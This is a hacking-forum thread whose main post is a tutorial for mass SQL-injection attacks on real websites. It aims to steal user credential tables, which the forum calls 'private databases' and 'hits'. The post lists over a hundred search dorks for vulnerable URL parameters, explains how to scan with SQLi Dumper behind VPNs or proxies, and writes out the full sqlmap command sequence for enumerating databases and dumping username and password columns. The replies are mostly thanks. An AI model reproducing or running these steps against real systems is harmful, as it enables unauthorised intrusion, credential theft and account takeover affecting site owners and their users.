New DB Dumping Method Tutorial (Private & Fast) [with Pictures]

[ForlaxPy 161]

Preface:

[align=center]

 

 

I have been into DB hacking for quite a while

now and always struggled finding new and

private databases to get good hits from.

I spoke with some very HQ members of this

community which were able to expand my

knowledge a lot. I planned on selling this

as an E-Book but after all everyone

should have access to private databases

as long as they are part of this community

 

!You might think this tutorial seems familliar at the beginning but the interesting part comes at the end so don't click away!

 

Okay now enough of this BS and lets get started!  [/align]

[hide]

[align=center]1. Python 2.7 + click +

 

2. SQLmap + click +

 

3. SQLiDumper + click +[/align]

 

[align=center]4. VPN Accounts (Check Accounts Section) [Hide My Ass works best)

 

 

5* . RDP / VPS

 

 

* not needed but helpfull

 

__________________________________________________________________________________________

 

Let's get started:

 

 

 

1. Create a new Folder called "DB Hacking" or something along

 

these lines. (Why? -> Else you might loose the overview)

 

 

 

2. Download and install Python 2.7.XXX.

 

Remember to add Python to your system path (Should look like this)

 

 

 

3. Download SQLiDumper 8.3 and add it into your folder.

 

 

 

Folder: DB Hacking

∟ SQLi Dumper 8.3

 

 

 

 

3. Download the newest sqlmap version and also add it into your folder.

 

 

Folder: DB Hacking

∟ SQLi Dumper 8.3

∟ sqlmapproject-xx

 

 

 

 

3. Go get yourself some dorks.

 

You dont know how?

+ click +

 

Or just use mine (These wont give you private DBs as other ppl can use them too)

 

profilefree.php?companyid=
art.php?content=
OnlineGames.asp?serieId=
show-patch.asp?uid=
dettaglio-referenza.asp?id=
coursedetail.html?id=
event_detail.asp?ev_id=
shop-item.php?id=
buynow.aspx?posid=
donation_search.php?f_school_id=
location_detail.php?idlocation=
detalle.php?rec_id=
actividades_unidade.asp?cod_unidade=
detalle.php?palabra=
special-price.html?size=
home.php?nav=
testimonios.php?id=
navsource.html?page_id=
healthandsafety.php?Action=
categories.asp?cid=
dispnews.php?idw=
training_detail.php?id=
custom_page.asp?id=
salelisting_new.asp?desc=
shopnames.php?letter=
division.asp?Id=
ShowCat.aspx?secId=
search.asp?strsearchtype=
news-detail.php?news=
default.asp?brandcode=
show_category.aspx?ParentCategoryID=
productlist.asp?categoryname=
index.asp?k=
IND_interiorSecciones.php?s=
member-benefits.php?mod=
rubrique.php?id_rub=
wpdocumentdisplay.aspx?contentid=
photo.asp?mmum=
pagegallery.php?pgid=
taxicard_type.php?type_id=
print_list.php?id=
kwsearch.php?word=
specifications-gallery.php?gallery=
ItemDetails.aspx?ItemID=
produits.php?docid=
pool.asp?hdnContent=
calendar_details.asp?xid=
s_noticias.asp?id=
ethnobotany.php?sterm=
consulta_main.php?id_imovel=
productlist.aspx?attributetype=
get_product.php?productid=
detail_en.asp?newsid=
dormire-bere-mangiare-san-vincenzo-scheda.php?id=
spotsspecies.php?s_specie_id=
Energize.php?cate=
productss_en.asp?bigclassid=
article.php?fid=
scheda_articolo.php?id=
downloadcatsearch.asp?cat=
star-bar.php?pid=
EventListing.asp?id=
actiuni_prezentare.php?idx=
ADDetail.asp?ID=
detailproduct.php?id=
knowledge_base.php?issue=
detail.php?id_product=
start.asp?productid=
licence.php?lang=
gru_en.php?id=
jobsearch.aspx?lang=
elook_anli.asp?id=
childrens-publisher.php?src=
movie.php?tvid=
jerseys.php?jersey_id=
departments.php?dept=
search.php?username=
cms.php?bf=
buy-detail.php?nwid=
index.asp?property_id=
VendorDetail.aspx?vid=
template_list.asp?code=
BookDesc.asp?catId=
ibm.asp?svpage=
jugar.php?id=
item_viewDesc.php?no=
ResultPage.aspx?pi=
page.asp?contentid=
article_b.asp?id=
customer_content.php?category_id=
application.asp?groupid=
eventview.php?cid=
kategori.php?kategori=
bulletin_board.asp?issue_id=
review.php?listing_id=
detalleNoticia.php?id_contenido=
default.asp?ERROR_CODE=
get_download.php?id=
rtrd.php?sfm_from_iframe=
interna.asp?Menu=
link_detail.php?linksPage=
property_list.php?county=
searchcatalog.asp?PartID=
article.htm?id=
ProductDetails.php?brand_id=
severdig_pub.php?Id=
comunicacao-visual-produtos.php?categ=
numerology_how_it_works.php?page=
reader.php?objid=
perfiles.php?id=
chama_centro_paginas.php?pg=
index.asp?configurar=
hot_jobs.asp?artID=
Discoveryontarget_Sponsor.aspx?id=
noticias.asp?lingua=
pettravelguide.php?pg=
show.php?kat=
greeting.aspx?format=
pp.php?id=
stilius.php?id=
history.asp?pageguid=

 

 

 

 

 

4. Open SQLi Dumper 8.3 and paste your Dorks

 

 

(You can now choose between using HMA 2.8.24.0 or proxies)

 

How to use HMA:

 

 

1. Buy / Crack a premium Acc.

2. Download HMA 2.8.24.0

3. Put in you login Deatails and connect fot the first time

 

  

 

 

Then reconnect your VPN and click Start Scanner > URLS only in SQLi Dumper

 

 

 

 

How to use Proxies:

 

Go to www.socks24.org and download the newest proxy-list.

In SQLiDumper go to Tools & Settings -> Proxy

And paste all your downloaded proxies into the SOCKS5 4 column and Test them

 

 

And paste all your downloaded proxies into the SOCKS5 4 column and Test them

It will take about 20 mins to check them all.

 

...wait untill all are checked...

 

Click ok.

 

Now from the Dropdown choose SOCKS5 4 Protocoll.

 

 

5. Start Checking the dorks.

 

This proccess will take a while and that why I recommend using a RDP / VPS but you can do it on your main PC too.

 

After a few hrs you should have around 20k URLs and now can start checking them by canceling the Online Scanner.

 

So switch to the exploitables tab and click < Start Scanner >

 

Wait for them to be checked completely.

 

Now go to the next Tab "Injectables" and start this as well.

 

You will notice that most of the URLs are Non-Injectable (But these are what we are here for).

 

 

6. "Injecting the Non-Injectables" <- lmao sounds like a movie

 

Go to the Non-Injectables Tab and CTRL+A > Right click > Clipboard

 

Go into your sqlmap folder and create a urls.txt

 

Folder: DB Hacking

∟ SQLi Dumper 8.3

∟ sqlmapproject-xx

∟ urls.txt

 

Paste all your Non-Inkectables in there.

 

Now Shift + Right Mouse

> Open cmd/powershell here

 

Now for the important command:

sqlmap.py -m "urls.txt" --random-agent -f --batch -o --tables --output-dir=OUTPUT

 

 

This command will now use the newest injections available and print out all the databases which are injectable.

You can always check which sites have already been tested by taking a look into the "OUTPUT" folder

There will be a lot of folders in the OUTPUT directory.

As some are still Non-Injectable I wrote a script to only keep the ones that are:

 

Download

 

https://www.file-upload.net/download-13433178/Cleaner.py.html

 

Run the file and you will be left with all folders containing a vulnerable Database. Now go back into the sqlmap folder and

open the cmd/powershell again.

Choose a folder from your output dir and open the target.txt

 

Copy the URL in there.

 

Now in your cmd type:

sqlmap.py -u "yoururl" --batch --dbs --output-dir=OUTPUT

This will give you a list of the DBs:

Now choose a DB which sounds like it would include the user:pass and type:

sqlmap.py -u "yoururl" --batch -D "Database Name" --tables --output-dir=OUTPUT

Now you have all table look for one like "users/ registration/ login..." and type:

sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" --columns --output-dir=OUTPUT

If you found the information you are looking for type:

sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" -C "Columns (example: username, pass)" --dump --eta --threads=5 --output-dir=OUTPUT

 

 

This will now dump the columns and give you an ETA of when they are done. Sometimes the passwords are encrypted and need to be dehased which sqlmap does automatically. Its really fast and easy. So have fun getting your private databases and show me some hits u got below.[/align]

 

[align=center]Don't Forget to leave a Like if you found this helpful!

[/align]

[/hide]

[mesvak 362]

"I spoke with some very HQ members of this community" think I was one of em

wasn't i

[Ragnarok 21]

Well done, it is nice to have fresh method on how to dump some new databases. Appreciate :)

[Tana Allen 75]

i would love to try it out and like you <3

[mdean 1]

thank you bro

[vasya45 21]

i would love to try it out and like you

[SioVer 41]

Nice Tutorial ! I like it :pepo:

[Madara000007 1]

omg i was searching for this for a long time , thanks a lot boss

[fxxxxxx21 0]

eyvallah cok teşekürler ederim saolsıun

[Ronboy11 1]

Lets check

[Devil 162]

thanks ima try

[saya12 2]

thanks fost this ia

[ZebzterXXZ 21]

Preface:

[align=center]

 

 

I have been into DB hacking for quite a while

now and always struggled finding new and

private databases to get good hits from.

I spoke with some very HQ members of this

community which were able to expand my

knowledge a lot. I planned on selling this

as an E-Book but after all everyone

should have access to private databases

as long as they are part of this community

 

!You might think this tutorial seems familliar at the beginning but the interesting part comes at the end so don't click away!

 

Okay now enough of this BS and lets get started!  [/align]

 

 

LIKED!

[MasterhaX 0]

thank you so much for sharing this! <3

[kb5 1]

will give this a try

[37811890 2]

ahhahahah sooo skere

[epiclama 3]

im interessed, lets see this

[AETERNUS 7]

Preface:

[align=center]

 

 

I have been into DB hacking for quite a while

now and always struggled finding new and

private databases to get good hits from.

I spoke with some very HQ members of this

community which were able to expand my

knowledge a lot. I planned on selling this

as an E-Book but after all everyone

should have access to private databases

as long as they are part of this community

 

!You might think this tutorial seems familliar at the beginning but the interesting part comes at the end so don't click away!

 

Okay now enough of this BS and lets get started!  [/align]

 

LInux or windows needed?

[ZDeez 0]

thanks needed this

[SSJ 208]

Fucking legend <3

[picklelover404 1]

thanks for the share bro. I've been looking for new ways to dump DB

[goraiasish 2]

thank you sir for this guide

[hassax 1]

Thanks allot man for shariing

[leopard 4]

Thanks For This Great Share

[aa123123 1]

I spoke with some very HQ members of this coI spoke with some very HQ members of this co